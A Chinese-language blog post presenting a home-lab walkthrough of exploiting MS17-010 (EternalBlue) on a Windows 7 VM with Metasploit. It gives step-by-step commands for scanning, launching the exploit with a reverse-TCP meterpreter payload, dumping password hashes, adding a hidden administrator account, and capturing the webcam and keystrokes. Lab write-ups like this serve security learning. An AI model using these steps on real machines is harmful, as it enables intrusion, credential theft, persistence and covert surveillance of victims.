<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="John Doe">
    
    
    
    
    
    
    <title>MS17-010 | EternalGemini</title>
    <!-- inject:style -->
    <link href="/css/style.css" rel="stylesheet" type="text/css">
    <!-- endinject -->
    <style>
        .cube-loading {
            top: 0;
            position: fixed;
            width: 100%;
            height: 100%;
            background: url('/images/lg/loading.gif') no-repeat center center;
            background-color: rgba(0,0,0,.7);
        }

        .cube-loading.out {
            display: none;
        }

        .cube-loading:before {
            display: block;
            content: 'Loading';
            position: relative;
            width: 100%;
            top: 50%;
            right: -50%;
            color: #fff;
        }

        @media(max-width: 768px) {
            .cube-loading:before {
                font-size: 1.2em;
                transform: translate(-24px,20px);
                -webkit-transform: translate(-24px,20px);
                -o-transform: translate(-24px,20px);
                -ms-transform: translate(-24px,20px);
            }
        }

        @media(min-width: 768px) {
            .cube-loading:before {

            }
        }
    </style>
    
<meta name="generator" content="Hexo 5.4.1"></head>
<body>
<div class="cube-body">
    <nav id="cube-top-memu" class="cube-menu">
    <ul class="cube-menu-collapse">
        
        <li>
            <i class="cube-icon cube-icon-home" aria-hidden="true"></i>
            <a href="/">首页</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-archive" aria-hidden="true"></i>
            <a href="/archives">归档</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-categories" aria-hidden="true"></i>
            <a href="/categories">分类</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-tags" aria-hidden="true"></i>
            <a href="/tags">标签</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-about" aria-hidden="true"></i>
            <a href="/about-me">关于我</a>
        </li>
        
    </ul>
</nav>
<nav class="cube-side-menu" id="cube-side-menu">
    <ul class="cube-menu-list">
        
        <li>
            <a class="lrc-control">Open Lyrics</a>
        </li>
        
        <li>
            <a class="scroll-to-top">Top</a>
        </li>
    </ul>
</nav>
    <header class="cube-header" id="cube-header">
    <img src=" http://cube-1252774894.cosgz.myqcloud.com/background.png " alt="头部背景图片">
    
    <div class="cube-type">
        <span class="cube-typed-title">senrenbankaの部落格</span>
        <span class="cube-typed-cursor">|</span>
    </div>
    
</header>

    <style>
        nav.cube-menu:before {
            content: '';
            visibility: hidden;
            position: absolute;
            left: 0;
            top: 0;
            width: 100%;
            height: 44px;
        
            filter: blur(5px);
            -webkit-filter: blur(5px);
        
            z-index: -1;
            background-image: url('http://cube-1252774894.cosgz.myqcloud.com/background.png');
            background-repeat: no-repeat;
            background-position: center -356px;
            background-size: cover;
            background-color: transparent;
        }

        header.cube-background.cube-header-background {
            visibility: hidden;
            background-image: url('http://cube-1252774894.cosgz.myqcloud.com/background.png');
            background-position: center -400px;
        }
    </style>
    <header class="cube-background cube-header-background">
        
        <div class="cube-type">
            <span class="cube-typed-title">senrenbankaの部落格</span>
            <span class="cube-typed-cursor">|</span>
        </div>
        
    </header>
    <div class="load-header-background"></div>
    <script>
        (function (window) {

            window.headerModule = {}
            window.headerModule.image = {
                width: '2000',
                height: '1414'
            }

        })(window)
    </script>
    
    <div class="cube-content">
        <div class="cube-left">
            <div class="cube-article">
    <h1 class="title">MS17-010</h1>
    
    <div class="cube-article-header">
        <div class="cube-article-date">
            <i class="cube-icon cube-icon-date" aria-hidden="true"></i>
            <!-- moment.js对象 -->
            2022-01-30
        </div>
        <div class="cube-article-tags">
    <i class="cube-icon cube-icon-tag" aria-hidden="true"></i>
    
    <a href="/tags/%E6%9C%AC%E5%AE%9E%E9%AA%8C%E4%BB%85%E4%BE%9B%E5%AD%A6%E4%B9%A0%E5%8F%82%E8%A7%82%EF%BC%81%EF%BC%81%EF%BC%81/">#本实验仅供学习参观！！！</a>
    
</div>
    </div>
    
    <div class="cube-article-content cube-markdown">
        
        <p>软件：Vmware Workstation 16</p>
<p>攻击机：Kali 192.168.0.109</p>
<p>靶机：windows 7 192.168.0.107</p>
<p>渗透工具：Metasploit</p>
<p>扫描工具：Nmap<br>解密工具: ophcrack</p>
<p>1.确保靶机和攻击机在同一个局域网，先查看攻击机的地址</p>
<p>ifconfig</p>
<p>攻击机地址为 192.168.0.10</p>
<span id="more"></span>

<img src="/p/8f17ee8c/1.png" class="">

<p>2.使用Nmap工具扫描攻击机所在内网段，查找目标主机是否存活</p>
<p>nmap -sP 192.168.0.0/24</p>
<p>发现靶机 192.168.0.107</p>
<img src="/p/8f17ee8c/2.png" class="">

<p>3.打开渗透工具</p>
<p>msfconsole</p>
<img src="/p/8f17ee8c/3.png" class="">

<p>4.搜索漏洞MS17-010</p>
<p>search ms17-010</p>
<img src="/p/8f17ee8c/4.png" class="">

<p>5.选择攻击模块2</p>
<p>use 2 或者use exploit/windows/smb/ms17_010_eternalblue</p>
<img src="/p/8f17ee8c/5.png" class="">

<img src="/p/8f17ee8c/6.png" class="">

<p>6.查看需要配置的信息</p>
<p>show options</p>
<img src="/p/8f17ee8c/7.png" class="">

<img src="/p/8f17ee8c/8.png" class="">

<p>7.配置需要配置的RHOSTS为靶机的地址</p>
<p>set RHOSTS 192.168.0.107</p>
<img src="/p/8f17ee8c/9.png" class="">

<p>8.设置攻击载荷 tcp反向链接</p>
<p>set payload windows/x64/meterpreter/reverse_tcp</p>
<img src="/p/8f17ee8c/10.png" class="">

<p>9.实施攻击（要关闭靶机的防火墙，不然会失败）</p>
<p>run 或者 exploit</p>
<img src="/p/8f17ee8c/11.png" class="">

<p>10.渗透后利用</p>
<p>a.截取靶机屏幕 screenshot</p>
<img src="/p/8f17ee8c/12.png" class="">

<img src="/p/8f17ee8c/14.png" class="">

<p>b.从攻击机上传文件到靶机</p>
<p>upload /root/ppp.jpeg C:\看不见我.jpeg</p>
<img src="/p/8f17ee8c/15.png" class="">

<img src="/p/8f17ee8c/16.png" class="">

<p>从靶机下载文件到攻击机</p>
<p>download C:\11.jpeg /root</p>
<p>download C:\11.exe /root</p>
<img src="/p/8f17ee8c/17.png" class="">

<img src="/p/8f17ee8c/18.png" class="">

<p>c.查看账户和密码并使用工具在线解密工具解密//也可以使用kali自带的ophcrack工具进行解密（这个要自己下载彩虹表）</p>
<p>hashdump</p>
<img src="/p/8f17ee8c/19.png" class="">

<p>打开一个新的命令窗口 输入ophcrack，将hash值复制过来，点击crack就可以爆破（我没有下载彩虹表，所以我采用在线工具破解，但是我的账户本来就没有设置密码，所以结果为空）</p>
<img src="/p/8f17ee8c/20.png" class="">

<img src="/p/8f17ee8c/21.png" class="">

<p>d. shell新增账户并远程登录目标主机</p>
<p>新建一个简单隐藏用户admin$ 密码为admin //用命令查看看不到改用户</p>
<img src="/p/8f17ee8c/22.png" class="">

<img src="/p/8f17ee8c/23.png" class="">

<p>将用户admin$添加到administrator组</p>
<p>net localgroup administrators admin$ /add</p>
<img src="/p/8f17ee8c/24.png" class="">

<p>开启远程管理服务</p>
<img src="/p/8f17ee8c/25.png" class="">

<p>通过物理机进行远程登录（这个要靶机同意，有点鸡肋）</p>
<img src="/p/8f17ee8c/26.png" class="">

<img src="/p/8f17ee8c/27.png" class="">

<p>e.开启摄像头</p>
<p>webcam_snap –&gt;通过摄像头拍照</p>
<img src="/p/8f17ee8c/29.png" class="">

<img src="/p/8f17ee8c/30.png" class="">

<p>webcam_stream –&gt;通过摄像头开启视频(这个就不演示了，保留一点神秘)</p>
<p>f.监听键盘</p>
<p>ps查看进程号，找到explorer.exe</p>
<img src="/p/8f17ee8c/31.png" class="">

<p>迁移进程</p>
<p>migrate 1408</p>
<img src="/p/8f17ee8c/32.png" class="">

<p>keyscan_start监听键盘</p>
<img src="/p/8f17ee8c/33.png" class="">

<p>keyscan_dump查看键盘输入的内容</p>
<img src="/p/8f17ee8c/34.png" class="">

<p>总结:这个渗透攻击的重点在于渗透后的利用，这里只是举出了一小部分例子，可以自己研究研究还可以实现哪些操作。</p>

    </div>
</div>

<div class="cube-article-nav">
    <ul>
        
        
    </ul>
</div>


<!-- TODO 根据theme.comment的内容进行入口选择 -->



        </div>
        <div class="cube-right">
            

<div class="cube-search cube-sidebar" id="cube-search">
    <div class="search-container">
        <input type="text" placeholder="Search" class="cube-search-input" id="cube-search-input">
        <i class="cube-icon cube-icon-search cube-search-submit" aria-hidden="true"></i>
    </div>
    <!-- TODO 通过给window赋一个全局变量，通过脚本赋值 -->
</div>
<script>
    (function (window) {
        'use strict';
        window.searchModule = {}
        window.searchModule.JSONUrl = '/content.json'
        window.searchModule.rootUrl = '/'
    })(window)
</script>
<div class="cube-search-form">
    <div class="cube-search-control">
        <input type="text" placeholder="Search" class="search-input">
        <a class="close-button">
            <i class="cube-icon cube-close" aria-hidden="true"></i>
        </a>
    </div>
    <div class="cube-search-result"></div>
</div>


<div class="cube-author cube-sidebar" id="cube-author">
    
    
    <span>John Doe</span>
    
    
    <div class="count">
        <a class="count articles"><span>1</span>Article</a>
        <a class="count tags"><span>1</span>Tags</a>
        <a class="count categories"><span>0</span>Categories</a>
    </div>
</div>



<div class="cube-music cube-sidebar" id="cube-music">
    <div class="cube-player aplayer" id="cube-player"></div>
</div>
<script>
    (function (window) {
        window.musicModule = {}
        window.musicModule.musicConfig = '{"narrow":false,"autoplay":false,"showlrc":3,"theme":"#b7daff","mutex":true,"mode":"circulation","preload":"auto","listmaxheight":"513px","music":[{"title":"Dear friends","author":"TRIPLANE","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/TRIPLANE - Dear friends.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Dear friends - TRIPLANE.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/TRIPLANE - Dear friends.jpg"},{"title":"Butter-Fly","author":"和田光司","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/和田光司 - Butter-Fly (ピアノヴァージョン).mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Butter-Fly (ピアノヴァージョン) - 和田光司.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/和田光司 - Butter-Fly (ピアノヴァージョン).jpg"},{"title":"宵闇花火","author":"葉月ゆら","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/葉月ゆら - 宵闇花火.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/宵闇花火 - 葉月ゆら.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/葉月ゆら - 宵闇花火.jpg"}]}'
        window.musicModule.lrcConfig = {
            open: 'Open Lyrics',
            close: 'Close Lyrics'
        }
    })(window)
</script>



<div class="cube-recent-posts cube-sidebar" id="cube-recent-posts">
    <div class="title">
        <a>Recent Posts</a>
    </div>
    <ul class="list">
        
        
        <li>
            <!-- TODO 如果文章要显示图片，那么在front-matter上添加preview属性(url or path) -->
            
            <div class="normal">
                <p class="index first">
                    <span>1</span>
                </p>
                <p class="title">
                    <a href="/p/8f17ee8c.html" title="MS17-010">MS17-010</a>
                </p>
            </div>
            
        </li>
        
        
    </ul>
</div>





<div class="cube-tagcloud cube-sidebar" id="cube-tagcloud">
    <div class="title">
        <a href="/tags">Tagcloud</a>
    </div>
    <div class="cube-boxs">
        
        
        <div class="cube-box ">
            <a href="/tags/%E6%9C%AC%E5%AE%9E%E9%AA%8C%E4%BB%85%E4%BE%9B%E5%AD%A6%E4%B9%A0%E5%8F%82%E8%A7%82%EF%BC%81%EF%BC%81%EF%BC%81/">#本实验仅供学习参观！！！</a>
        </div>
        
    </div>
</div>



<div class="cube-links cube-sidebar" id="cube-links">
    <div class="title">
        <a>Links</a>
    </div>
    <ul class="list">
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/GitHub.png">
            
            <a href="https://github.com/ZEROKISEKI" target="_blank">GitHub</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/Coding.png">
            
            <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/SF.png">
            
            <a href="https://segmentfault.com/u/aonosora" target="_blank">SF社区</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/开发者头条.png">
            
            <a href="https://toutiao.io/u/148070" target="_blank">开发者头条</a>
        </li>
        
    </ul>
</div>



<div class="cube-friend-links cube-sidebar" id="cube-friend-links">
    <div class="title">
        <a>Friend Links</a>
    </div>
    <ul class="list">
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/micblo.png">
            <a href="https://blog.micblo.com/" target="_blank">罗大佬</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/DIYgod.jpg">
            <a href="https://www.anotherhome.net/" target="_blank">DIYgod</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="/images/friend_links.jpg ">
            <a href="https://aonosora.com/" target="_blank">咪西西の部落格</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="image/zt.jpg">
            <a href="https://echozt.github.io/" target="_blank">zt</a>
        </li>
        
    </ul>
</div>


        </div>
    </div>
</div>
<footer class="cube-footer">
    
© 2017 John Doe

<br>
Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
</footer>
<!-- inject:script -->
<script src="/js/script.js"></script>
<!-- endinject -->
<div class="cube-loading out"></div>
</body>
</html>